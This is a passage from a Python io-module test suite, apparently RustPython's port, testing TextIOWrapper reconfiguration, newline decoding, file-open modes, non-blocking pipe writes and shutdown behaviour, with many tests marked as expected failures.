self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
        # Issue 31271: calling write() when the encoder's encode() returns an
        # invalid value shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
        # Issue 31243: calling read() when the decoder's getstate() returns an
        # invalid value should neither crash the interpreter nor raise a
        # SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
        # TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
        # but utf-8-sig does not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
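# Example (assuming the common case where array('i').itemsize == 4):
# _to_memoryview(b'abcdefg') drops the 3 trailing bytes that do not fill a
# whole item and returns a memoryview whose tobytes() is b'abcd'.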
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_constructor(self):
super().test_constructor()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_detach(self):
super().test_detach()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_encoding_read(self):
super().test_reconfigure_encoding_read()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_line_buffering(self):
super().test_reconfigure_line_buffering()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_basic_io(self):
super().test_basic_io()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_telling(self):
super().test_telling()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_uninitialized(self):
super().test_uninitialized()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_non_text_encoding_codecs_are_rejected(self):
super().test_non_text_encoding_codecs_are_rejected()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_repr(self):
super().test_repr()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines(self):
super().test_newlines()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines_input(self):
super().test_newlines_input()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_read_one_by_one(self):
super().test_read_one_by_one()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_read_by_chunk(self):
super().test_read_by_chunk()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_1(self):
super().test_issue1395_1()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_2(self):
super().test_issue1395_2()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_3(self):
super().test_issue1395_3()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_4(self):
super().test_issue1395_4()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_issue1395_5(self):
super().test_issue1395_5()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_through(self):
super().test_reconfigure_write_through()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_fromascii(self):
super().test_reconfigure_write_fromascii()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write(self):
super().test_reconfigure_write()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_write_non_seekable(self):
super().test_reconfigure_write_non_seekable()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_defaults(self):
super().test_reconfigure_defaults()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_newline(self):
super().test_reconfigure_newline()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(os_helper.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newlines(self):
super().test_newlines()
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
# XXX RUSTPYTHON: universal mode is deprecated anyway, so I
# feel fine about skipping it
# with support.check_warnings(('', DeprecationWarning)):
# f = self.open(os_helper.TESTFN, "U")
# self.assertEqual(f.name, os_helper.TESTFN)
# self.assertEqual(f.buffer.name, os_helper.TESTFN)
# self.assertEqual(f.buffer.raw.name, os_helper.TESTFN)
# self.assertEqual(f.mode, "U")
# self.assertEqual(f.buffer.mode, "rb")
# self.assertEqual(f.buffer.raw.mode, "rb")
# f.close()
f = self.open(os_helper.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a')
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(os_helper.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
# TODO: RUSTPYTHON, cyclic gc
@unittest.expectedFailure
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(os_helper.TESTFN, "wb")
self._check_warn_on_dealloc(os_helper.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(os_helper.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if the file already exists
with self.open(os_helper.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(os_helper.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(os_helper.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
